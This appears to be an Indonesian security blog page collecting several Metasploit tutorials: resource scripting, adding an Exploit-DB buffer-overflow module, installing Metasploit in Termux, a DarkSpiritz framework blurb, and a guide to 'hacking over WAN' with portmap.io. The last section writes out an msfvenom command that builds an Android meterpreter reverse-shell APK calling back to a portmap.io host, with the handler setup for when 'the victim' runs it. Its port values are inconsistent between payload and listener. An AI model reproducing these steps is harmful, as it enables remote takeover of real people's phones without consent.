Maxteroit: Metasploit
Metasploit Scripting


Bagi para pentester, nama metasploit sudah tidak asing lagi bukan ?
Atau jika anda tidak mengetahui apa itu metasploit, anda bisa mencari tahu apa itu metasploit melalui link berikut : Apa Itu Metasploit 
Jika anda sudah mengetahui metasploit itu sendiri, anda akan mudah memahami apa tujuan dari artikel ini.

Apa Itu Metasploit Scripting

Metasploit Scripting adalah suatu teknik yang bertujuan untuk memudahkan kita dalam melakukan pengaturan MSFConsole yang ada di Metasploit itu sendiri, baik dari pengaturan LHOST, LPORT, RPORT atau commands apapun yang ada di dalam MSFConsole si Metasploit ini.

Contoh bukan Metasploit Scripting :
Saat kita akan melakukan exploitasi pada suatu sistem dengan Metasploit, tentunya kita ini wajib masuk pada MSFConsole bukan ? 
Di MSFConsole kita pasti memasukkan beberapa command, seperti mengatur Listener Host Maupun Port, dengan mengetikkan satu-persatu seperti berikut :

Metasploit Scripting

Contoh yang menggunakan Metasploit Scripting :


Metasploit Scripting

Tidak terlalu berbeda dengan yang tidak menggunakan Metasploit Scripting, tetapi pada metasploit scripting, semua dilakukan otomatis ketika kita running msfconsole di terminal kita.
Penasaran dengan cara membuatnya ? OK langsung ke tutorial saja.

Tutorial Metasploit Scripting

  1. Tentukan dahulu text editor apa yang akan kita gunakan, kalo saya sih menggunakan nano, supaya mudah dan gk ribet, sekalian di terminal pula.
  2. Jika sudah menentukan text editor apa yang akan kita gunakan, lalu kalian tinggal cari lokai folder metasploit-framework kalian, bisa dengan menggunakan perintah locate metasploit-framework 
  3. Jika sudah menemukan lokasi foldernya, langsung saja masuk ke folder yang namanya scripts
  4. Lalu masuk lagi ke folder meterpreter
  5. Nah setelah berada di folder meterpreter, kita buat sebuah file yang berekstensi .rb, contohnya seperti berikut :

  6. Disana saya menggunakan nano, kalian tinggal menyesuakan saja, yang penting lokasinya berada di folder yang telah disebutkan tadi.
  7. Isi file yang telah kita buat tadi dengan pengaturan msfconsole yang kalian butuhkan, disini saya menggunakan pengaturan basic yang digunakan ketika saya akan melakukan exploitasi Sistem Operasi Windows, seperti berikut :

    Metasploit Scripting
  8. Lalu save, ingat nama filenya harus berekstensi .rb

Praktek

Mudah saja, kalian hanya tinggal memasukkan perintah msfconsole -r namafile.rb seperti berikut :

Metasploit Scripting
Maka hasilnya akan seperti diatas, atau seperti ini :

Metasploit Scripting

Jika sudah seperti itu, maka script metasploit kalian sudah berhasil dibuat dan dijalankan.
Sekian Terima Kasih.

Metasploit Scripting

Menambahkan Modul Metasploit dari Exploit-DB Atau Pihak Ketiga

Seperti kita ketahui, Metasploit Framework adalah salah satu framework eksploitasi yang paling populer. Seringkali modul dan exploit baru selalu dikembangkan untuk Metasploit dari waktu ke waktu oleh hacker dan peneliti keamanan(security researchers), tetapi semuanya tidak termasuk dalam konfigurasi dasar atau pembaruan.

Untuk kasus-kasus ini, Anda perlu menginstal modul pihak ketiga secara manual ke Metasploit Framework. Menambahkan modul ke dalam MSF tidak begitu sulit jika Anda memiliki beberapa keterampilan Linux.

Ada begitu banyak platform di mana Anda dapat menemukan Modul Pihak Ketiga Metasploit yang bagus seperti exploit-db.com, github.com dan packetstormsecurity.com.

Cara Menambahkan Modul Metasploit dari Exploit-DB Atau Pihak Ketiga


Di Exploit-db.com, Anda dapat dengan mudah menemukan daftar Modul Metasploit yang baik dengan mencari "metasploit" di bilah pencarian yang ditampilkan di sisi kanan atas.

Module Metasploit Exploit-DB

Seperti yang dapat Anda lihat pada tangkapan layar di atas, lebih dari 2000 exploit / module tersedia di exploit-db.com yang sangat berarti untuk pentester.

Koleksi Modul Metasploit yang Luar Biasa - Github.com

Dalam tutorial ini, kami akan menambahkan exploit overflow buffer untuk VX Search Enterprise v9.5.12. Modul ini mengeksploitasi kerentanan buffer overflow berbasis stack di antarmuka web VX Search Enterprise v9.5.12, yang disebabkan oleh batas yang tidak benar memeriksa jalur permintaan dalam permintaan GET HTTP yang dikirim ke server web built-in. Modul ini telah berhasil diuji pada Windows 7 SP1 x86.

Untuk menambahkan modul apa pun ke dalam Repositori Metasploit, navigasikan ke /usr/share/metasploit-framework/modules/exploits/windows/smb dengan mengetikkan perintah di bawah ini:
cd /usr/share/metasploit-framework/modules/exploits/windows/smb

Tahap add module metasploit

Sekarang unduh file exploit dari exploit-db.com dan tempel ke path di atas di bawah direktori / smb dengan mengetikkan perintah di bawah ini:
wget (exploit link)


Sebelum memeriksa modul di layar Depan Metasploit, pastikan Anda harus memulai kembali msfconsole atau mengetikkan perintah msfupdate dari terminal Anda.

Atau Anda juga dapat mengetik perintah “reload_all” di bawah terminal MSF untuk memuat ulang semua modul dan path seperti yang ditunjukkan di bawah ini:


Sekarang ketikkan perintah "search VX" di terminal MSF Anda dan Anda akan melihat modul terinstal terbaru untuk VX Enterprise.


Sayangnya, modul ini sudah tersedia dalam versi terbaru dari Metasploit Framework tetapi dengan nama yang berbeda yaitu vxsrchs_bof.

Untuk menggunakan modul ini, ketik "use exploit/windows/smb/42057" di terminal MSF Anda.


Sekarang, ketikkan “info” lebih lanjut untuk mengetahui lebih lanjut tentang modul ini.


Jika Anda memuat modul Metasploit yang baru dan menarik, ketahuilah bahwa hal-hal ini akan cenderung memiliki akses ke apa pun yang Anda akses; dua kali lipat jika Anda Mengikutsertakan dalam hak akses root. Modul Metasploit adalah Ruby teks biasa, sehingga Anda dapat membacanya - tetapi harap berhati-hati, dan hanya tambahkan modul eksternal dari sumber tepercaya; jangan hanya mengambil modul lama yang Anda lihat di Internet, karena Anda mungkin Anda akan terkena backdoor (atau lebih buruk) dalam waktu singkat.

Begitulah cara menambahkan modul metasploit dari pihak exploit-db atau pihak ketiga. Semoga bermanfaat bagi kalian yang sedang mendalami metasploit.

Menambahkan Modul Metasploit dari Exploit-DB Atau Pihak Ketiga

Seperti yang sudah pernah saya bahas fungsi dan kegunaan Metasploit adalah aplikasi yang dipakai secara luas sebagai exploitation tools dalam bidang hacking dan IT Security, tools ini banyak digunakan baik oleh beginner ataupun professional. Pada kesempatan ini saya akan berikan panduan install metasploit di android dengan aplikasi termux. Script installer metasploit ini sudah fix tidak ada error nokogiri.

Jadi buat kamu yang pengen belajar menggunakan metasploit terutama yang banyak di minati adalah hack window atau smarthphone dengan metasploit, tapi gak punya pc, tenang aja kamu bisa kok belajar metasploit hanya dengan android. Yuk disimak tahap penginstalannya.

Install Metasploit Pada Android Fix Error Nokogiri

Fungsi Metasploit dan Cara Install Metasploit di Termux

Install Aplikasi Termux

1. Download aplikasi termux di google playstore atau lewat sini
2. Masuk ke aplikasi termux, lalu tunggu proses penginstallan ±5 menit tergantung kecepatan koneksi internet kamu.
3. Jika sudah selesai kamu akan masuk pada sebuah terminal linux, lakukan update dan upgrade terlebih dahulu dan menginstal "git" dengan perintah berikut:
$ pkg update && upgrade
$ pkg install git

Install Metasploit di Android

Tahap selanjutnya adalah mendownload script installer metasploit yang sudah fix tidak ada error dan menjalankan installernya dengan perintah berikut:
$ git clone https://github.com/Hax4us/Metasploit_termux
$ cd Metasploit_termux
$ chmod +x metasploit.sh
$ bash metasploit.sh

Tunggu prosesnya hingga selesai, lumayan memakan waktu karena proses download tergantung dari kecepatan koneksi internet yang kamu gunakan.

Untuk membuka console metaploit masukan perintah berikut:
$ msfconsole

Sampai disini kamu sudah berhasil menginstall metasploit pada android yang kamu gunakan, selamat belajar.

Info Script Metasploit Installer:
  • fix nokogiri failed install
  • running latest metasploit version
  • fix postgresql
  • fix database connection

Fungsi Metasploit dan Cara Install Metasploit di Termux


What is DarkSpiritz?

Created by the SecTel Team it was a project of one of the owners to update and clean-up an older pentesting framework he had created to something updated and modern. DarkSpiritz is a re-vamp of the very popular framework known as "Roxysploit". You may be familiar with this framework and if you are then it will help you with DarkSpiritz. DarkSpiritz also works like another pentesting framework known as Metasploit. If you know how to use metasploit setting up and working with DarkSpiritz will be a breeze. Inside the program itself you will find a lot of help and documentation on plugins or you can head to our wiki here. If you need any help feel free to contact us at [email protected].
Getting Started
Clone the repository with git:
git clone https://github.com/DarkSpiritz/DarkSpiritz.git
DarkSpiritz wiki available here
To install DarkSpiritz clone the github repo and run:
sudo python installer.py
This will download all necessary modules for DarkSpiritz. Once you run this you will be able to run:
python main.py
from within the same directory as DarkSpiritz.
You will see a start-up screen. This screen will display things like commands and configuration settings. You can set configuration settings inside the config.xml file itself or through commands in the DarkSpiritz shell.

Features:
These are features that DarkSpiritz Team prides themself on based on this program:
  • Real Time Updating of Configuration
  • Never a need to restart the program even when adding plugins or editing them.
  • Easy to use UX
  • Multi-functionality

Screenshots:




 

DarkSpiritz - A Penetration Testing Framework For UNIX Systems

Hacking aringan WAN menggunakan portmap.io

Karena sebagian besar ISP tidak menyediakan port forwarding, peretasan pada WAN selalu menjadi tugas yang sulit beberapa tahun lalu. Kemudian, SSH tunneling dan Premium VPN datang sebagai alternatif untuk Port Forwarding dan memungkinkan peretas meretas WAN.

Server Ngrok sebagai penyedia tunneling SSH terkemuka, tetapi masalah dengan mereka adalah kurangnya ketekunan. Setiap kali saat Anda tersambung kembali, Anda akan diberikan subdomain acak.

Untuk mengatasi hal ini, Serveo.net hadir dengan fitur "Subdomain Unik" yang memungkinkan pengguna untuk memilih subdomain mereka sendiri. Padahal, Serveo.net tidak mencapai banyak seperti ngrok lakukan.

Masalah dengan VPN berbayar adalah biaya mereka. Meskipun mereka menyediakan fasilitas port forwarding, biayanya lebih mahal. Sekarang, Portmap.io com menawarkan konfigurasi pemetaan port gratis yang dapat digunakan dengan Open VPN untuk penerusan port dan melakukan pengujian Penetrasi melalui WAN.

Hal-hal yang Anda perlukan sebelum melanjutkan:



Hack WAN Tanpa Port Forwarding menggunakan Portmap.io:
Create New Configuration
  • Setelah login, click "Create New Configuration"
Portmap.io Configuration
  • Pilih nama untuk konfigurasi Anda. (Dalam olan gratis portmap.io, Anda dapat mengonfigurasi hanya satu pemetaan saja. Anda harus membayar dan berlangganan untuk lebih banyak lagi)
  • Tipe default adalah "Open VPN"
  • Ubah protokol menjadi "TCP" jika berada di UDP secara default.
  • Sekarang, klik "Generate" untuk menghasilkan file konfigurasi
  • Setelah itu, Unduh file konfigurasi.
  • Setelah mengunduh, klik "Create" untuk membuat file. (Anda dapat mengunduh sebelum pembuatan)
Configuration Successfully
  • Sekarang berhasil membuat file konfigurasi, Beralih ke "Mapping Rules" dan klik "Crate New Rules"
  • Sekarang, konfigurasikan Aturan seperti yang diberikan pada gambar di bawah ini
port forwarding di portmap.io
  • Semua nilai akan diisi secara default, yang harus Anda lakukan hanyalah memilih port untuk diteruskan.
  • Disini, saya memilih untuk meneruskan port 4444. Anda dapat memilih port Anda sendiri.
  • Setelah memasukkan port pilihan Anda, Klik "create" untuk membuat Maping Rules.
  • Dalam pembuatan payload, "humanerror666-51596.portmap.io" akan berfungsi sebagai Lhost dan 51596 akan berfungsi sebagai Lport.
  • Untuk Android buka aplikasi OpenVPN,

  •  Clik OVPN Profile
  • lalu buka file ovpn yang telah anda unduh tadi. Klik Import
  • Lalu ADD
  • Dan Connect-kan tombolnya berasa di bawah tulisan DISCONNECTED

  • Sekarang, koneksi vpn akan dimulai dan Anda akan terhubung ke vpn.

  • Untuk membuat payload dengan msfvenom, ketik, 
  • $ msfvenom -p android/meterpreter/reverse_tcp LHOST = humanerror666-51596.portmap.io LPORT = 51596 R> sdcard/nama_payload.apk
  • Setelah sukses membuat payload, untuk membuat listener di Metasploit, ketik
  • $ use exploit/multi/handler
  • set payload /android/meterpreter/reverse_tcp
  • set lhost humanerror666-51596.portmap.io 
  • set lport 4444
  • exploit 
  • Sekarang, eksploit akan berhasil diluncurkan dan Anda akan mendapatkan listener setelah payload yang Anda buat telah dieksekusi oleh korban.



Kelebihan menggunakan Portmap.io adalah Anda tidak akan lagi mengalami session died dan Anda tidak perlu mensetting ulang payload untuk mendapatkan listener.

Jika Anda memiliki pertanyaan, Silahkan beri komentar di Artikel ini. Share Artikel ini jika Anda suka :D Terimakasih .

Catatan : Untuk OpenVPN-nya gunakan OpenVPN dari repositories. Jika belum ada silahkan ikuti saja perintahnya :
apt-get install openvpn
Lalu load file ovpn tadi dengan perintah
openvpn <nama config config file>

Atasi Session Died di Metasploit dan Koneksi VPN yang Tidak Stabil

Subscribe Our Newsletter